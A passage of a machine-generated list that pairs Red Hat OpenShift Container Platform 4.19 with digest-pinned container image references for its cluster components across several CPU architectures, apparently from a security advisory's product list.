"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
